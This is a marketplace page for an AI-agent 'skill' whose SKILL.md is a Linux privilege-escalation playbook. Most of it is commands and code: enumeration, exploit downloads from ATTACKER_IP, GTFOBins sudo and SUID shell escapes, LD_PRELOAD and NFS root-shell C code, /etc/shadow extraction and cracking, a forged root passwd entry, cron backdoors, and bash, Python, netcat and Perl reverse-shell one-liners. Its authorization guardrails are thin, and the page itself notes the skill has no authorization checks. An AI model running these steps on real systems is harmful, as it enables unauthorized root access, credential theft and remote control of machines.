How do I install Linux Privilege Escalation?

Install Linux Privilege Escalation with a single command: npx mdskills install sickn33/linux-privilege-escalation. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Linux Privilege Escalation?

Linux Privilege Escalation works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Linux Privilege Escalation

Name: Linux Privilege Escalation: AI Agent Skill
Rating: 9 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/linux-privilege-escalation

Fork & Edit

Skill Advisor9.0

Comprehensive privilege escalation guide with detailed techniques, examples, and troubleshooting

+Provides systematic workflow with specific commands and exploitation techniques
+Includes practical examples showing exact command sequences and expected outputs
+Covers multiple attack vectors with quick reference tables and troubleshooting
-Lacks explicit authorization verification triggers before executing exploits

SKILL.md

Edit in Browser

1---
2name: Linux Privilege Escalation
3description: This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Linux Privilege Escalation
10 
11## Purpose
12 
13Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
14 
15## Inputs / Prerequisites
16 
17### Required Access
18- Low-privilege shell access to target Linux system
19- Ability to execute commands (interactive or semi-interactive shell)
20- Network access for reverse shell connections (if needed)
21- Attacker machine for payload hosting and receiving shells
22 
23### Technical Requirements
24- Understanding of Linux filesystem permissions and ownership
25- Familiarity with common Linux utilities and scripting
26- Knowledge of kernel versions and associated vulnerabilities
27- Basic understanding of compilation (gcc) for custom exploits
28 
29### Recommended Tools
30- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
31- Linux Exploit Suggester (LES)
32- GTFOBins reference for binary exploitation
33- John the Ripper or Hashcat for password cracking
34- Netcat or similar for reverse shells
35 
36## Outputs / Deliverables
37 
38### Primary Outputs
39- Root shell access on target system
40- Privilege escalation path documentation
41- System enumeration findings report
42- Recommendations for remediation
43 
44### Evidence Artifacts
45- Screenshots of successful privilege escalation
46- Command output logs demonstrating root access
47- Identified vulnerability details
48- Exploited configuration files
49 
50## Core Workflow
51 
52### Phase 1: System Enumeration
53 
54#### Basic System Information
55Gather fundamental system details for vulnerability research:
56 
57```bash
58# Hostname and system role
59hostname
60 
61# Kernel version and architecture
62uname -a
63 
64# Detailed kernel information
65cat /proc/version
66 
67# Operating system details
68cat /etc/issue
69cat /etc/*-release
70 
71# Architecture
72arch
73```
74 
75#### User and Permission Enumeration
76 
77```bash
78# Current user context
79whoami
80id
81 
82# Users with login shells
83cat /etc/passwd | grep -v nologin | grep -v false
84 
85# Users with home directories
86cat /etc/passwd | grep home
87 
88# Group memberships
89groups
90 
91# Other logged-in users
92w
93who
94```
95 
96#### Network Information
97 
98```bash
99# Network interfaces
100ifconfig
101ip addr
102 
103# Routing table
104ip route
105 
106# Active connections
107netstat -antup
108ss -tulpn
109 
110# Listening services
111netstat -l
112```
113 
114#### Process and Service Enumeration
115 
116```bash
117# All running processes
118ps aux
119ps -ef
120 
121# Process tree view
122ps axjf
123 
124# Services running as root
125ps aux | grep root
126```
127 
128#### Environment Variables
129 
130```bash
131# Full environment
132env
133 
134# PATH variable (for hijacking)
135echo $PATH
136```
137 
138### Phase 2: Automated Enumeration
139 
140Deploy automated scripts for comprehensive enumeration:
141 
142```bash
143# LinPEAS
144curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
145 
146# LinEnum
147./LinEnum.sh -t
148 
149# Linux Smart Enumeration
150./lse.sh -l 1
151 
152# Linux Exploit Suggester
153./les.sh
154```
155 
156Transfer scripts to target system:
157 
158```bash
159# On attacker machine
160python3 -m http.server 8000
161 
162# On target machine
163wget http://ATTACKER_IP:8000/linpeas.sh
164chmod +x linpeas.sh
165./linpeas.sh
166```
167 
168### Phase 3: Kernel Exploits
169 
170#### Identify Kernel Version
171 
172```bash
173uname -r
174cat /proc/version
175```
176 
177#### Search for Exploits
178 
179```bash
180# Use Linux Exploit Suggester
181./linux-exploit-suggester.sh
182 
183# Manual search on exploit-db
184searchsploit linux kernel [version]
185```
186 
187#### Common Kernel Exploits
188 
189| Kernel Version | Exploit | CVE |
190|---------------|---------|-----|
191| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
192| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
193| 5.8+ | Dirty Pipe | CVE-2022-0847 |
194 
195#### Compile and Execute
196 
197```bash
198# Transfer exploit source
199wget http://ATTACKER_IP/exploit.c
200 
201# Compile on target
202gcc exploit.c -o exploit
203 
204# Execute
205./exploit
206```
207 
208### Phase 4: Sudo Exploitation
209 
210#### Enumerate Sudo Privileges
211 
212```bash
213sudo -l
214```
215 
216#### GTFOBins Sudo Exploitation
217Reference https://gtfobins.github.io for exploitation commands:
218 
219```bash
220# Example: vim with sudo
221sudo vim -c ':!/bin/bash'
222 
223# Example: find with sudo
224sudo find . -exec /bin/sh \; -quit
225 
226# Example: awk with sudo
227sudo awk 'BEGIN {system("/bin/bash")}'
228 
229# Example: python with sudo
230sudo python -c 'import os; os.system("/bin/bash")'
231 
232# Example: less with sudo
233sudo less /etc/passwd
234!/bin/bash
235```
236 
237#### LD_PRELOAD Exploitation
238When env_keep includes LD_PRELOAD:
239 
240```c
241// shell.c
242#include <stdio.h>
243#include <sys/types.h>
244#include <stdlib.h>
245 
246void _init() {
247    unsetenv("LD_PRELOAD");
248    setgid(0);
249    setuid(0);
250    system("/bin/bash");
251}
252```
253 
254```bash
255# Compile shared library
256gcc -fPIC -shared -o shell.so shell.c -nostartfiles
257 
258# Execute with sudo
259sudo LD_PRELOAD=/tmp/shell.so find
260```
261 
262### Phase 5: SUID Binary Exploitation
263 
264#### Find SUID Binaries
265 
266```bash
267find / -type f -perm -04000 -ls 2>/dev/null
268find / -perm -u=s -type f 2>/dev/null
269```
270 
271#### Exploit SUID Binaries
272Reference GTFOBins for SUID exploitation:
273 
274```bash
275# Example: base64 for file reading
276LFILE=/etc/shadow
277base64 "$LFILE" | base64 -d
278 
279# Example: cp for file writing
280cp /bin/bash /tmp/bash
281chmod +s /tmp/bash
282/tmp/bash -p
283 
284# Example: find with SUID
285find . -exec /bin/sh -p \; -quit
286```
287 
288#### Password Cracking via SUID
289 
290```bash
291# Read shadow file (if base64 has SUID)
292base64 /etc/shadow | base64 -d > shadow.txt
293base64 /etc/passwd | base64 -d > passwd.txt
294 
295# On attacker machine
296unshadow passwd.txt shadow.txt > hashes.txt
297john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
298```
299 
300#### Add User to passwd (if nano/vim has SUID)
301 
302```bash
303# Generate password hash
304openssl passwd -1 -salt new newpassword
305 
306# Add to /etc/passwd (using SUID editor)
307newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
308```
309 
310### Phase 6: Capabilities Exploitation
311 
312#### Enumerate Capabilities
313 
314```bash
315getcap -r / 2>/dev/null
316```
317 
318#### Exploit Capabilities
319 
320```bash
321# Example: python with cap_setuid
322/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
323 
324# Example: vim with cap_setuid
325./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
326 
327# Example: perl with cap_setuid
328perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
329```
330 
331### Phase 7: Cron Job Exploitation
332 
333#### Enumerate Cron Jobs
334 
335```bash
336# System crontab
337cat /etc/crontab
338 
339# User crontabs
340ls -la /var/spool/cron/crontabs/
341 
342# Cron directories
343ls -la /etc/cron.*
344 
345# Systemd timers
346systemctl list-timers
347```
348 
349#### Exploit Writable Cron Scripts
350 
351```bash
352# Identify writable cron script from /etc/crontab
353ls -la /opt/backup.sh        # Check permissions
354echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
355 
356# If cron references non-existent script in writable PATH
357echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
358chmod +x /home/user/antivirus.sh
359```
360 
361### Phase 8: PATH Hijacking
362 
363```bash
364# Find SUID binary calling external command
365strings /usr/local/bin/suid-binary
366# Shows: system("service apache2 start")
367 
368# Hijack by creating malicious binary in writable PATH
369export PATH=/tmp:$PATH
370echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
371chmod +x /tmp/service
372/usr/local/bin/suid-binary      # Execute SUID binary
373```
374 
375### Phase 9: NFS Exploitation
376 
377```bash
378# On target - look for no_root_squash option
379cat /etc/exports
380 
381# On attacker - mount share and create SUID binary
382showmount -e TARGET_IP
383mount -o rw TARGET_IP:/share /tmp/nfs
384 
385# Create and compile SUID shell
386echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
387gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
388 
389# On target - execute
390/share/shell
391```
392 
393## Quick Reference
394 
395### Enumeration Commands Summary
396| Purpose | Command |
397|---------|---------|
398| Kernel version | `uname -a` |
399| Current user | `id` |
400| Sudo rights | `sudo -l` |
401| SUID files | `find / -perm -u=s -type f 2>/dev/null` |
402| Capabilities | `getcap -r / 2>/dev/null` |
403| Cron jobs | `cat /etc/crontab` |
404| Writable dirs | `find / -writable -type d 2>/dev/null` |
405| NFS exports | `cat /etc/exports` |
406 
407### Reverse Shell One-Liners
408```bash
409# Bash
410bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
411 
412# Python
413python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
414 
415# Netcat
416nc -e /bin/bash ATTACKER_IP 4444
417 
418# Perl
419perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
420```
421 
422### Key Resources
423- GTFOBins: https://gtfobins.github.io
424- LinPEAS: https://github.com/carlospolop/PEASS-ng
425- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
426 
427## Constraints and Guardrails
428 
429### Operational Boundaries
430- Verify kernel exploits in test environment before production use
431- Failed kernel exploits may crash the system
432- Document all changes made during privilege escalation
433- Maintain access persistence only as authorized
434 
435### Technical Limitations
436- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
437- AppArmor/SELinux may restrict exploitation techniques
438- Container environments limit kernel-level exploits
439- Hardened systems may have restricted sudo configurations
440 
441### Legal and Ethical Requirements
442- Written authorization required before testing
443- Stay within defined scope boundaries
444- Report critical findings immediately
445- Do not access data beyond scope requirements
446 
447## Examples
448 
449### Example 1: Sudo to Root via find
450 
451**Scenario**: User has sudo rights for find command
452 
453```bash
454$ sudo -l
455User user may run the following commands:
456    (root) NOPASSWD: /usr/bin/find
457 
458$ sudo find . -exec /bin/bash \; -quit
459# id
460uid=0(root) gid=0(root) groups=0(root)
461```
462 
463### Example 2: SUID base64 for Shadow Access
464 
465**Scenario**: base64 binary has SUID bit set
466 
467```bash
468$ find / -perm -u=s -type f 2>/dev/null | grep base64
469/usr/bin/base64
470 
471$ base64 /etc/shadow | base64 -d
472root:$6$xyz...:18000:0:99999:7:::
473 
474# Crack offline with john
475$ john --wordlist=rockyou.txt shadow.txt
476```
477 
478### Example 3: Cron Job Script Hijacking
479 
480**Scenario**: Root cron job executes writable script
481 
482```bash
483$ cat /etc/crontab
484* * * * * root /opt/scripts/backup.sh
485 
486$ ls -la /opt/scripts/backup.sh
487-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
488 
489$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
490 
491# Wait 1 minute
492$ /tmp/bash -p
493# id
494uid=1000(user) gid=1000(user) euid=0(root)
495```
496 
497## Troubleshooting
498 
499| Issue | Solutions |
500|-------|-----------|
501| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |
502| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
503| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
504| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |
505

Full transparency — inspect the skill content before installing.